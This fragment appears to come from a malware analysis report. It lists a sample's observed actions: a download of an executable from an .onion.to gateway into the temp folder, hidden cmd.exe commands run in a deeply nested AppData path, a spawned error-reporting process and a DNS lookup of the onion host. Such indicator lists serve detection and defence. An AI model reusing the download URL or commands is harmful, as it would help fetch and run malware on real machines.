Technical Information
- https://4r2pvzqvs7kfckh6.onion.to/querty.exe as %temp%\hjtudhbj67.exe
- '<SYSTEM32>\cmd.exe' /c cd %APPDATA%\asdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasd...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1928
- %TEMP%\1237836.cvr
- DNS ASK 4r######s7kfckh6.onion.to
- '<SYSTEM32>\cmd.exe' /c cd %APPDATA%\asdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasd...' (with hidden window)